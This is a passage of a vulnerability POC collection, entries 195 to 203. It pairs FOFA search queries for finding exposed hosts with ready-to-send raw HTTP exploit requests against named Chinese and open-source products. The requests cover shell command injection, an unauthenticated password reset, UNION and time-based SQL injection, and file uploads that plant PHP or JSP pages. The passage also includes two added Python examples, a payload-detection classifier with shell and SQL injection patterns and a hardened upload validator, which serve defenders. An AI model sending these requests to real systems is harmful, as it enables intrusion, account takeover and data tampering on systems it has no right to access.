The body is JSON even though the declared Content-Type is form-urlencoded; the name field is concatenated into a shell command, so ;uname -a; runs on the device.
POST /send_order.cgi?parameter=operation HTTP/1.1
Host: 127.0.0.1
Pragma: no-cache
Cache-Control: no-cache
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.0.0 Safari/537.36
Accept: */*
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Connection: close
Content-Type: application/x-www-form-urlencoded
Content-Length: 68

{"opid":"777777777777777777","name":";uname -a;echo ","type":"rest"}

196. 河南省风速科技 unified authentication platform: unauthenticated password reset
FOFA:body="/cas/themes/zbvc/js/jquery.min.js"
xgh (学工号, the student/staff ID) selects the account and newPass is the password that gets set. The request overwrites a real credential, so only test it against an account you control.
POST /cas/userCtl/resetPasswordBySuper HTTP/1.1
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/93.0.4577.63 Safari/537.36
Content-Type: application/json;charset=UTF-8
X-Requested-With: XMLHttpRequest
Host:
Accept: text/html, image/gif, image/jpeg, *; q=.2, */*; q=.2
Content-Length: 45
Connection: close

{"xgh":"test","newPass":"test666","email":""}

197. 浙大恩特 customer resource management system: Quotegask_editAction SQL injection
FOFA:app="浙大恩特客户资源管理系统"
UNION-based injection through goonumStr; if the injected 111*111 is evaluated, 12321 appears in the response. The ;.js suffix on the path is part of the POC.
GET /entsoft/Quotegask_editAction.entweb;.js?goonumStr=1')+UNION+ALL+SELECT+111*111--+&method=goonumIsExist HTTP/1.1
Host:
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_4) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2656.18 Safari/537.36
Accept-Encoding: gzip, deflate
Connection: close

198. 阿里云盘 (Aliyun Drive) WebDAV, aliyundrive-webdav LuCI app: command injection
CVE-2024-29640
The sid value is percent-encoded shell command substitution; it decodes to `ls />/www/aaa.txt` (on OpenWrt /www is the web root, so the listing becomes readable over HTTP). A valid LuCI sysauth session cookie is required; the value below is a placeholder.
GET /cgi-bin/luci/admin/services/aliyundrive-webdav/query?sid=%60%6c%73%20%2f%3e%2f%77%77%77%2f%61%61%61%2e%74%78%74%60%20 HTTP/1.1
Cookie: sysauth=41273cb2cffef0bb5d0653592624cf64
Accept: */*
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9,en;q=0.8,en-GB;q=0.7,en-US;q=0.6
Connection: close

199. Cockpit CMS: assetsmanager/upload file upload
FOFA:title="Authenticate Please!"
This is an authenticated upload: the flow fetches the login page for its csfr token (a JWT), logs in with valid credentials (the POC tries admin/admin) to obtain a session cookie, then uploads a PHP file and requests it.

1. Fetch the login page and read the csfr token from the response:
GET /auth/login?to=/ HTTP/1.1

Response: 200; the body contains csfr:"eyJ0eXAiOiJKV1QiLCJhbGciOiJIUzI1NiJ9.eyJjc2ZyIjoibG9naW4ifQ.6KvuRJo3-Dp2UouwGH9D8cmnXEL4NGNen9CX3ex86cw"

2. Use that JWT together with credentials to obtain a session cookie:
POST /auth/check HTTP/1.1
Content-Type: application/json

{"auth":{"user":"admin","password":"admin"},"csfr":"eyJ0eXAiOiJKV1QiLCJhbGciOiJIUzI1NiJ9.eyJjc2ZyIjoibG9naW4ifQ.6KvuRJo3-Dp2UouwGH9D8cmnXEL4NGNen9CX3ex86cw"}

Response: 200, with:
Set-Cookie: mysession=95524f01e238bf51bb60d77ede3bea92; path=/

3. Upload with the session cookie (the PHP file deletes itself after the first request):
POST /assetsmanager/upload HTTP/1.1
Content-Type: multipart/form-data; boundary=---------------------------36D28FBc36bd6feE7Fb3
Cookie: mysession=95524f01e238bf51bb60d77ede3bea92

-----------------------------36D28FBc36bd6feE7Fb3
Content-Disposition: form-data; name="files[]"; filename="tttt.php"
Content-Type: text/php

<?php echo "tttt";unlink(__FILE__);?>
-----------------------------36D28FBc36bd6feE7Fb3
Content-Disposition: form-data; name="folder"


-----------------------------36D28FBc36bd6feE7Fb3--

4. The uploaded file is reachable at /storage/uploads/tttt.php

200. SeaCMS (海洋影视管理系统): dmku SQL injection
FOFA:app="海洋CMS"
Time-based blind injection against MySQL (sleep(5)) through the id parameter. Note that ac=del invokes the delete action, so run this only against a test instance.
GET /js/player/dmplayer/dmku/?ac=del&id=(select(0)from(select(sleep(5)))v)&type=list HTTP/1.1
Cookie: PHPSESSID=hlfl5flck9q3ng1blehhv86s4s
Upgrade-Insecure-Requests: 1
Cache-Control: max-age=0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9

201. 方正 (Founder) omnimedia news editing system: binary.do SQL injection
FOFA:body="/newsedit/newsedit/" || app="FOUNDER-全媒体采编系统"
TableName is concatenated into the query. Decoded, the value is: DOM_IMAGE where REFID=-1 union select '1'; WAITFOR DELAY '0:0:5';select DOM_IMAGE from IMG_LARGE_PATH (stacked MSSQL statements; a vulnerable host answers about 5 seconds late).
POST /newsedit/newsplan/task/binary.do HTTP/1.1
Content-Type: application/x-www-form-urlencoded
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Connection: close

TableName=DOM_IMAGE+where+REFID%3D-1+union+select+%271%27%3B+WAITFOR+DELAY+%270%3A0%3A5%27%3Bselect+DOM_IMAGE+from+IMG_LARGE_PATH&FieldName=IMG_LARGE_PATH&KeyName=REFID&KeyID=1

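Added example, not part of the original list and not code from any of the vendors above: the POCs in entries 188 through 201 are all written in the same raw-request form, and defenders usually want them as detection checks rather than as attack requests. The Python below parses that raw-request format (request line, headers, blank line, body) and flags the payload classes those entries use: time-based SQL injection (MSSQL WAITFOR DELAY, MySQL sleep()), UNION SELECT, ../ in the path, file:// and /etc/passwd reads, and backtick, $(), os.system() or ;command shell injection. The rules, the host placeholders and the SAMPLES dictionary are constructed here for illustration; the samples are modelled on entries 188, 189, 191, 195, 198 and 200 plus one benign request.

```python
"""Parse the raw-request POCs on this page and flag their payload classes.

Added example (not the page's or any vendor's code).  Rules, sample
requests and host placeholders are constructed for illustration.
"""
import json
import re
from urllib.parse import parse_qsl, unquote, unquote_plus, urlsplit

# (label, regex) pairs applied to the decoded path, query and body.  Each
# keys on syntax the payload cannot drop: the delay keyword, UNION SELECT,
# a ../ segment, file:// or /etc/passwd, command substitution, ;<command>.
RULES = [
    ("sqli_time_based", re.compile(r"waitfor\s+delay\s*'|\bsleep\s*\(", re.I)),
    ("sqli_union", re.compile(r"\bunion\s+(?:all\s+)?select\b", re.I)),
    ("path_traversal", re.compile(r"\.\./")),
    ("file_read", re.compile(r"/etc/passwd|\bfile://", re.I)),
    ("cmd_injection", re.compile(
        r"`[^`]+`|\$\([^)]*\)|os\.system\s*\(|;\s*(?:uname|ls|cat|echo|wget|curl|sh|bash)\b",
        re.I)),
]


def parse_raw_request(raw):
    """Split 'METHOD target HTTP/x', header lines, blank line, body."""
    raw = raw.replace("\r\n", "\n").strip("\n")
    head, _, body = raw.partition("\n\n")
    lines = head.split("\n")
    method, target = lines[0].split()[:2]
    headers = {}
    for line in lines[1:]:
        name, _, value = line.partition(":")
        headers[name.strip().lower()] = value.strip()
    parts = urlsplit(target)
    return {"method": method, "path": unquote(parts.path),
            "query": unquote_plus(parts.query), "headers": headers, "body": body}


def _strings_in(obj):
    """Yield every string nested anywhere in a decoded JSON value."""
    if isinstance(obj, dict):
        for v in obj.values():
            yield from _strings_in(v)
    elif isinstance(obj, list):
        for v in obj:
            yield from _strings_in(v)
    elif isinstance(obj, str):
        yield obj


def body_values(body):
    """Attacker-controlled values in a body.  The Content-Type header is
    deliberately ignored: entry 195 sends JSON under x-www-form-urlencoded,
    so the body is sniffed instead of trusting what the client declares."""
    body = body.strip()
    if not body:
        return []
    if body[0] in "{[":
        try:
            return list(_strings_in(json.loads(body)))
        except ValueError:
            pass
    return [v for _, v in parse_qsl(body, keep_blank_values=True)] or [unquote_plus(body)]


def classify(raw):
    """Return (method, decoded path, sorted labels of every rule that fired)."""
    req = parse_raw_request(raw)
    # The whole decoded query/body is scanned as well as each value, so a
    # payload split by ';' or '&' still matches as one string.
    values = [req["path"], req["query"], unquote_plus(req["body"]), *body_values(req["body"])]
    hits = {label for value in values for label, rx in RULES if rx.search(value)}
    return req["method"], req["path"], sorted(hits)


# Constructed samples modelled on entries 188, 189, 191, 195, 198 and 200;
# "your-ip" is a placeholder, nothing here is sent anywhere.
SAMPLES = {
    "188": "GET /attachment?file=/etc/passwd HTTP/1.1\nHost: your-ip\n\n",
    "189": ("GET /xds/deleteStudy.php?documentUniqueId=1%27;WAITFOR%20DELAY%20%270:0:5%27-- HTTP/1.1\n"
            "Host: your-ip\n\n"),
    "191": ("POST /CDGServer3/js/../NavigationAjax HTTP/1.1\nHost: your-ip\n"
            "Content-Type: application/x-www-form-urlencoded\n\n"
            "command=nav&id=1'waitfor delay '0:0:5'--+&name=&openId="),
    "195": ("POST /send_order.cgi?parameter=operation HTTP/1.1\nHost: your-ip\n"
            "Content-Type: application/x-www-form-urlencoded\n\n"
            '{"opid":"777777777777777777","name":";uname -a;echo ","type":"rest"}'),
    "198": ("GET /cgi-bin/luci/admin/services/aliyundrive-webdav/query"
            "?sid=%60%6c%73%20%2f%3e%2f%77%77%77%2f%61%61%61%2e%74%78%74%60%20 HTTP/1.1\n"
            "Host: your-ip\n\n"),
    "200": ("GET /js/player/dmplayer/dmku/?ac=del&id=(select(0)from(select(sleep(5)))v)&type=list HTTP/1.1\n"
            "Host: your-ip\n\n"),
    "benign": "GET /js/player/dmplayer/dmku/?ac=list&id=42&type=list HTTP/1.1\nHost: your-ip\n\n",
}


def scan_samples():
    """Classify every sample; returns {entry: [labels]}."""
    return {name: classify(raw)[2] for name, raw in SAMPLES.items()}


if __name__ == "__main__":
    for name, labels in scan_samples().items():
        print(f"{name:>6}: {', '.join(labels) or '-'}")
```

Entry 191 fires twice on purpose: the /js/../ segment in its path is a traversal indicator in its own right, independent of the WAITFOR payload in the body. The ;command list and the rest of the patterns are a starting point and should be tuned against your own traffic before being used to block.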
202. 微擎 system: AccountEdit arbitrary file upload
FOFA:body="/Widgets/WidgetCollection/"
The POC uploads a benign 1123.txt to confirm the upload path; the ASP.NET form needs the page's current __VIEWSTATE and __EVENTVALIDATION values.
1. Fetch the __VIEWSTATE and __EVENTVALIDATION values:
GET /User/AccountEdit.aspx HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/531.36 (KHTML, like Gecko) Chrome/83.0.4103.112 Safari/537.31
Content-Length: 0

2. Substitute those two values into the form below and submit it:
POST /User/AccountEdit.aspx HTTP/1.1
Accept-Encoding: gzip, deflate, br
Content-Type: multipart/form-data;boundary=---------------------------786435874t38587593865736587346567358735687

-----------------------------786435874t38587593865736587346567358735687
Content-Disposition: form-data; name="__VIEWSTATE"

__VIEWSTATE
-----------------------------786435874t38587593865736587346567358735687
Content-Disposition: form-data; name="__EVENTVALIDATION"

__EVENTVALIDATION
-----------------------------786435874t38587593865736587346567358735687
Content-Disposition: form-data; name="ctl00$MyContentPlaceHolder$ctl00$upload"; filename="1123.txt"
Content-Type: text/plain

Hello World!
-----------------------------786435874t38587593865736587346567358735687
Content-Disposition: form-data; name="ctl00$MyContentPlaceHolder$ctl00$bttnUpload"

上传图片
-----------------------------786435874t38587593865736587346567358735687
Content-Disposition: form-data; name="ctl00$MyContentPlaceHolder$ctl00$txtLastName"


-----------------------------786435874t38587593865736587346567358735687
Content-Disposition: form-data; name="ctl00$MyContentPlaceHolder$ctl00$txtEmail"


-----------------------------786435874t38587593865736587346567358735687--

3. The uploaded file is stored at /_data/Uploads/1123.txt

203. 红海云 EHR: PtFjk file upload
FOFA:body="RedseaPlatform"
The part's Content-Type (image/jpeg) is only the client's claim; the server keeps the .jsp filename, so the upload lands as an executable page.
POST /RedseaPlatform/PtFjk.mob?method=upload HTTP/1.1
Host: x.x.x.x
Accept-Encoding: gzip
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryt7WbDl1tXogoZys4
Content-Length: 210

------WebKitFormBoundaryt7WbDl1tXogoZys4
Content-Disposition: form-data; name="fj_file"; filename="11.jsp"
Content-Type: image/jpeg

<% out.print("hello,eHR");%>
------WebKitFormBoundaryt7WbDl1tXogoZys4--

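Added example, not code from the page or from any of the vendors above: the multipart uploads in entries 194, 199, 202 and 203 work because the receiving handler trusts the client-supplied filename and Content-Type. The Python below parses a multipart/form-data body and applies the checks a hardened handler needs: the filename must be a bare name (no separators or control characters, which refuses the ../../jboss/web/fe.war/hello.jsp trick from entry 194), the extension must be on an allow-list (which refuses 11.jsp from entry 203 regardless of the claimed image/jpeg), the client's Content-Type is never used for the decision, and the resolved path is re-checked to sit under the upload root. SAMPLE_BODY, BOUNDARY, ALLOWED_EXTENSIONS and UPLOAD_ROOT are this example's own assumptions; the two malicious parts mirror the filenames used in entries 194 and 203.

```python
"""Multipart upload parsing plus the checks the vulnerable handlers lack.

Added example, not the page's or any vendor's code.  The sample body,
the extension allow-list and the upload root are assumptions made here;
the malicious parts mirror the filenames used in entries 194 and 203.
"""
import posixpath
import re

ALLOWED_EXTENSIONS = {".jpg", ".jpeg", ".png", ".gif", ".pdf", ".txt"}  # assumed policy
UPLOAD_ROOT = "/var/app/uploads"  # assumed; keep it outside the web root


def parse_multipart(body, boundary):
    """Return [{name, filename, content_type, data}] for a multipart/form-data body."""
    delimiter = b"--" + boundary.encode()
    parts = []
    for chunk in body.split(delimiter)[1:]:  # [0] is the preamble before the first part
        if chunk.startswith(b"--"):            # "--boundary--" closes the body
            break
        head, _, data = chunk.lstrip(b"\r\n").partition(b"\r\n\r\n")
        disposition, content_type = {}, None
        for line in head.decode("latin-1").split("\r\n"):
            name, _, value = line.partition(":")
            if name.strip().lower() == "content-disposition":
                disposition = dict(re.findall(r'(\w+)="([^"]*)"', value))
            elif name.strip().lower() == "content-type":
                content_type = value.strip()
        parts.append({"name": disposition.get("name"),
                      "filename": disposition.get("filename"),
                      "content_type": content_type,
                      # the CRLF before the next delimiter belongs to the delimiter
                      "data": data[:-2] if data.endswith(b"\r\n") else data})
    return parts


def validate_upload(part, upload_root=UPLOAD_ROOT):
    """Return the path a file part may be stored at, or raise ValueError.

    The filename must be a bare name (no / or backslash, no control
    characters), carry an allow-listed extension, and resolve under the
    upload root.  The client's Content-Type is reported but never trusted.
    """
    filename = part.get("filename") or ""
    if not filename:
        raise ValueError("missing filename")
    if re.search(r"[\\/\x00-\x1f]", filename) or filename in (".", ".."):
        raise ValueError(f"path-like or control characters in filename {filename!r}")
    ext = posixpath.splitext(filename)[1].lower()
    if ext not in ALLOWED_EXTENSIONS:
        raise ValueError(f"extension {ext!r} not allowed (client claimed {part.get('content_type')!r})")
    target = posixpath.normpath(posixpath.join(upload_root, filename))
    if posixpath.commonpath([upload_root, target]) != upload_root:
        raise ValueError("resolved path escapes the upload root")
    return target


# Constructed body: a traversal filename (as in entry 194), a .jsp under a
# spoofed image/jpeg Content-Type (as in entry 203), a legitimate image and
# a plain text field with no filename (as the "folder" field in entry 199).
BOUNDARY = "----ExampleBoundary7f3a"
SAMPLE_BODY = (
    b"------ExampleBoundary7f3a\r\n"
    b'Content-Disposition: form-data; name="uploadFile"; filename="../../../../../jboss/web/fe.war/hello.jsp"\r\n'
    b"Content-Type: text/plain\r\n\r\n"
    b'<% out.println("hello");%>\r\n'
    b"------ExampleBoundary7f3a\r\n"
    b'Content-Disposition: form-data; name="fj_file"; filename="11.jsp"\r\n'
    b"Content-Type: image/jpeg\r\n\r\n"
    b'<% out.print("hello,eHR");%>\r\n'
    b"------ExampleBoundary7f3a\r\n"
    b'Content-Disposition: form-data; name="fj_file"; filename="photo.jpg"\r\n'
    b"Content-Type: image/jpeg\r\n\r\n"
    b"\xff\xd8\xff\xe0fake-jpeg-bytes\r\n"
    b"------ExampleBoundary7f3a\r\n"
    b'Content-Disposition: form-data; name="folder"\r\n\r\n'
    b"\r\n"
    b"------ExampleBoundary7f3a--\r\n"
)


def review_upload(body=SAMPLE_BODY, boundary=BOUNDARY):
    """Return {filename: stored path or 'REJECTED: reason'} for each file part."""
    results = {}
    for part in parse_multipart(body, boundary):
        if part["filename"] is None:  # ordinary form field, not a file
            continue
        try:
            results[part["filename"]] = validate_upload(part)
        except ValueError as exc:
            results[part["filename"]] = f"REJECTED: {exc}"
    return results


if __name__ == "__main__":
    for filename, outcome in review_upload().items():
        print(f"{filename!r}: {outcome}")
```

Rejecting a path-like filename outright, rather than silently taking its basename, is deliberate: a client that sends ../ is not a browser, and the rejection is worth logging. The allow-list is on the final extension only, so shell.jsp.jpg is accepted and stored as a .jpg; servers that map handlers on anything other than the last extension need a stricter rule.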